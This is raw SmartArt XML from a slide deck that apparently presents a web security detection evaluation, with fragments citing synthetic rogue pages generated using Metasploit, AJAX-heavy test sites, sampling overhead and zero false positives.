          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4395D986-6C88-408D-BCB6-3F6BE3F6D187}" type="sibTrans" cxnId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EAF02F3-E587-4EB9-A86A-556B72CEB44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5-10% with sampling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BAEEB4BA-F991-48EC-9C7B-69D0A62F0805}" type="parTrans" cxnId="{F89F1F0A-176E-465E-970E-5BEC866F360F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FD10D51-290C-44A2-B49A-42AEA60D1635}" type="sibTrans" cxnId="{F89F1F0A-176E-465E-970E-5BEC866F360F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8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2,000 synthetic rogue pages generated using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Metasploit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FB605CB-8D98-4A66-83AD-304B2A2A3C05}" type="parTrans" cxnId="{03393624-1832-4055-A14A-06AAADE55B1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CAA3A87-AD6C-4C8E-ADA0-AADE4630E5E9}" type="sibTrans" cxnId="{03393624-1832-4055-A14A-06AAADE55B1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E6407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10 popular AJAX-heavy sites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BF4D51D-DF84-4E0F-8CD1-4CD5789EE4E3}" type="parTrans" cxnId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B315838F-C176-4805-8DEC-9BC11BD25D9D}" type="sibTrans" cxnId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" type="pres">
      <dgm:prSet presAssocID="{C156226F-41F8-4C7F-9438-1530F832FC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F2EC0-DA29-4CED-9A3B-301ED71D39CC}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" presName="box" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E924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F69754-DEB3-4EEA-94C8-EA30FD9F6437}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E924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10207-A1CE-48EA-9B48-CA29FC989295}" type="pres">
      <dgm:prSet presAssocID="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" presName="box" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA1312B1-E36D-4993-ACDF-2299664C6124}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC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5BF02F-2C6F-4153-9A00-E35B97A656E3}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126F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05F9F-9DE8-4639-BF94-509C1521AE4A}" type="pres">
      <dgm:prSet presAssocID="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" presName="box" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54C60950-B23B-4769-ACE5-1F976D1AA119}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A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650A36-B1A6-43DF-AF0D-427E18142423}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5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A9AE6-6E50-45E6-84C6-3129087AEEA4}" type="presOf" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9816829D-4939-494B-8F89-A1C3F157C491}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" srcOrd="1" destOrd="0" parTransId="{6A767E8E-0D70-4D86-8E25-6514472640C4}" sibTransId="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}"/>
    <dgm:cxn modelId="{03393624-1832-4055-A14A-06AAADE55B1B}" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" srcOrd="1" destOrd="0" parTransId="{FFB605CB-8D98-4A66-83AD-304B2A2A3C05}" sibTransId="{1CAA3A87-AD6C-4C8E-ADA0-AADE4630E5E9}"/>
    <dgm:cxn modelId="{4E0B9344-0095-4F22-B9CF-F74E304840F9}" type="presOf" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B3F7BD4C-8E86-4361-A951-50D72554647D}" type="presOf" srcId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F89F1F0A-176E-465E-970E-5BEC866F360F}" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" srcOrd="1" destOrd="0" parTransId="{BAEEB4BA-F991-48EC-9C7B-69D0A62F0805}" sibTransId="{3FD10D51-290C-44A2-B49A-42AEA60D1635}"/>
    <dgm:cxn modelId="{4B3302B9-7E61-4966-A608-E4AC74801481}" type="presOf" srcId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{4F374E0A-6811-4814-A2AB-DE280861A299}" type="presOf" srcId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" srcOrd="2" destOrd="0" parTransId="{72EF87C9-BEC4-4AC0-9FFD-727D2930318D}" sibTransId="{F621A551-C7AC-44B7-A205-322EF7C41F94}"/>
    <dgm:cxn modelId="{5733991C-1730-40AF-BD6F-395BAFCB1B50}" type="presOf" srcId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F816EBB1-EB9B-406F-A0C0-61B104D6B5BA}" type="presOf" srcId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B9615220-11A6-4427-AB0A-5F0C83A70E86}" type="presOf" srcId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8632DEF2-EC4D-4AA5-ACEF-01461BA7069B}" type="presOf" srcId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AE756FDE-7982-47BD-B91B-FEC168AA97F6}" type="presOf" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{50275A42-0064-435A-92C3-40D4A9BE1846}" type="presOf" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" srcOrd="1" destOrd="0" parTransId="{782B4437-07A0-4E5A-85C7-3FF83CC4E84E}" sibTransId="{E01572F0-8222-4FB7-9B54-517D0F0F4B27}"/>
    <dgm:cxn modelId="{991C40FB-2835-4658-91F1-DD8F5A204C83}" type="presOf" srcId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" srcOrd="0" destOrd="0" parTransId="{DC5B9E11-4B1E-490A-ADA4-504825673E7D}" sibTransId="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}"/>
    <dgm:cxn modelId="{41A9BCF2-8707-41FC-9D44-4099B78040EA}" type="presOf" srcId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" srcOrd="0" destOrd="0" parTransId="{4BF4D51D-DF84-4E0F-8CD1-4CD5789EE4E3}" sibTransId="{B315838F-C176-4805-8DEC-9BC11BD25D9D}"/>
    <dgm:cxn modelId="{4A497791-AFEB-49AD-89DE-1AF7DDF93655}" type="presOf" srcId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8DC6C1A1-44C1-4CB5-92BE-24040A905363}" type="presOf" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{58F6D32E-BEEA-41B4-8C26-2580C08482EF}" type="presOf" srcId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{A496AD75-EA65-4B49-BA86-8F26172FDB03}" type="presOf" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" srcOrd="0" destOrd="0" parTransId="{1DFA58F4-89F8-46BA-BB88-CEC3495411EA}" sibTransId="{3868F040-BEA2-4A7A-908D-8F7D3FE23CBF}"/>
    <dgm:cxn modelId="{904D2E4C-E531-4403-B48F-2641C7C6CA6E}" type="presOf" srcId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" srcOrd="0" destOrd="0" parTransId="{A44EAEB2-4EB8-4D05-B0C6-8D7BC5798E5B}" sibTransId="{4395D986-6C88-408D-BCB6-3F6BE3F6D187}"/>
    <dgm:cxn modelId="{980E564E-D23C-4723-B042-2ADCE2DCED49}" type="presOf" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{5507C57A-7F2D-45C3-8230-14B1223F3657}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{FCE838FF-FD0B-45A2-BDF5-70CC69E0107E}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{97C2C215-A715-423E-8374-04EC02A09379}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{BBB12518-29C1-41F5-8DE8-BFDB16B7C89E}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9C762BD6-F783-46CF-873F-15161699BEFD}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{01B10207-A1CE-48EA-9B48-CA29FC989295}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9AFAAE09-AC24-4054-8CD6-266FB5A3363C}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AE9D8650-2CFC-4149-9951-49D9EA896B77}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{12523354-9216-464D-9347-424ECBBBBDF1}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{DA1312B1-E36D-4993-ACDF-2299664C6124}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{424A1B9A-E068-48A2-9FB5-97E0BA2216BF}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{966BFE71-C7D1-4B30-8FB0-1FCBBDD4EEC2}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{04805F9F-9DE8-4639-BF94-509C1521AE4A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E6B65A15-E796-4AFF-809B-0D634D0C3A34}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{1C1DB89E-4E27-4800-897B-B3C91B2DDFAA}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2DCDD182-CB29-4DDE-A1B7-ECF9D22D74C0}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{54C60950-B23B-4769-ACE5-1F976D1AA119}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{3A8FE956-165C-4E32-A058-52AEC80A3975}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4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03E6-D1CA-4B35-B3FE-A5B5E8B64D13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4696617" y="13920"/>
          <a:ext cx="945319" cy="94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obj</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2600" i="1" kern="1200" baseline="300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96617" y="13920"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C84910B3-A3E3-4FB6-8173-F3EA353F641F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 20572473"/>
            <a:gd name="adj4" fmla="val 18983743"/>
            <a:gd name="adj5" fmla="val 46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FC4A4-AF3C-486B-982F-75194A1DA8A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5751094" y="1840327"/>
          <a:ext cx="945319" cy="94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</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" i="1" kern="1200" baseline="-25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endParaRPr lang="en-US" sz="1800" i="1" kern="1200" baseline="-250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751094" y="1840327"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5735B892-F379-43DC-B59B-A10218BC6885}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 2365799"/>
            <a:gd name="adj4" fmla="val 777069"/>
            <a:gd name="adj5" fmla="val 465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DCEC2-04D0-4DD5-93BF-3ED86B4CD02F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4696617" y="3666735"/>
          <a:ext cx="945319" cy="94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SA(B</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" i="1" kern="1200" baseline="-25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r>
            <a:rPr lang="en-US" sz="18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en-US" sz="1800" i="1" kern="1200" baseline="300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96617" y="3666735"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB7964A8-5E75-4643-8E23-B9DC31C662A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 6110409"/>
            <a:gd name="adj4" fmla="val 4439133"/>
            <a:gd name="adj5" fmla="val 465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C3D76-C097-44BD-8861-D5701E565E18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2587663" y="3666735"/>
          <a:ext cx="945319" cy="94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SA(o)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="18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87663" y="3666735"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17E22335-461B-48BA-B7B2-5C5C4823A97E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 9772473"/>
            <a:gd name="adj4" fmla="val 8183743"/>
            <a:gd name="adj5" fmla="val 46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DD902-AE6A-4281-915A-FCF738B93D4F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1533186" y="1840327"/>
          <a:ext cx="945319" cy="94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SA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="18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533186" y="1840327"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{46E8C96F-64FA-4EBF-8D28-682A05591407}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 13165799"/>
            <a:gd name="adj4" fmla="val 11577069"/>
            <a:gd name="adj5" fmla="val 465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FE44DC-8BC8-406D-AC6C-5B9DF13F9963}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2587663" y="13920"/>
          <a:ext cx="945319" cy="94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NSA(H)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" i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87663" y="13920"/>
        <a:ext cx="945319" cy="945319"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3E33E440-24ED-4D0A-B594-1FB1A79645C6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1806147" y="4334"/>
          <a:ext cx="4617305" cy="4617305"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3992"/>
            <a:gd name="adj2" fmla="val 250458"/>
            <a:gd name="adj3" fmla="val 16910409"/>
            <a:gd name="adj4" fmla="val 15239133"/>
            <a:gd name="adj5" fmla="val 46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24302-0FEE-4A65-9627-5399FD6B15F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="8229600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itchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> 0 False Positives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10 popular AJAX-heavy sites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150 top Web sites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790481" y="0"/>
